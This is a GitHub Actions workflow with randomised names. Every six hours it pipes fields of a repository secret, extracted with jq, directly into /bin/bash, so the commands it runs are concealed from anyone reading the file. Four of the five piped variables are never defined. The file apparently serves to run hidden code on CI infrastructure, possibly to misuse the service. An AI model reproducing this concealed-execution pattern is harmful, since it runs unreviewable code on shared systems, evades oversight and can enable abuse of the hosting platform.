name: huquanan7890
on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huquanan7890
        env:
          zqkx2: ${{ secrets.zqkx2 }}
        run: |
          echo $zqkx2 | jq -r .xxnk30963 | /bin/bash
          echo $fjf238 | jq -r .ecy6331 | /bin/bash
          echo $juhob5 | jq -r .lr8159 | /bin/bash
          echo $pfo264 | jq -r .dc1 | /bin/bash
          echo $hnzig26 | jq -r .yyv9 | /bin/bash

